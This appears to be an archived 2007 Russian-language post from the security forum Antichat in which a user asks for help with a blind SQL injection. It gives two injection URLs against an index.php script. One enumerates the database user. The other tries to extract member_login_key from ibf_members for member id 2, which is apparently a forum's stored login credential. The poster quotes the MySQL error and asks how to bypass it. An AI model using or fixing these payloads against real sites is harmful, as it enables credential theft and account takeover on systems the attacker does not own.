Форум АНТИЧАТ - Blind SQL-Inj. Нужна помощь...

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

Blind SQL-Inj. Нужна помощь...

14.10.2007, 20:55

L0rd_Ha0S

Участник форума

Регистрация: 25.01.2006

Сообщений: 158

Провел на форуме:
1000724

Репутация: 361

Blind SQL-Inj. Нужна помощь...

Есть скрипт, подверженный Blind SQL-инъекции:

Код:

index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring(user(),1,1)))>1/*

запрос успешно выполняется, все символы спокойно перебираются.

Если вместо user() поставить (select+member_login_key+from+ibf_members+where+id =2), чтоб было вот так:

Код:

index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring((select+member_login_key+from+ibf_members+where+id=2),1,1)))>1/*

то выдается ошибка:

Цитата:

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'select member_login_key from ibf_members where id=2),1,1)))>1/*

Указанные поле и таблица точно существуют. Пробовал также варианты с aes_decrypt/aes_encrypt, char(), concat() - безрезультатно.

Кто-нить знает, почему выдается эта ошибка, и как это обойти? Запрос ведь верный вроде...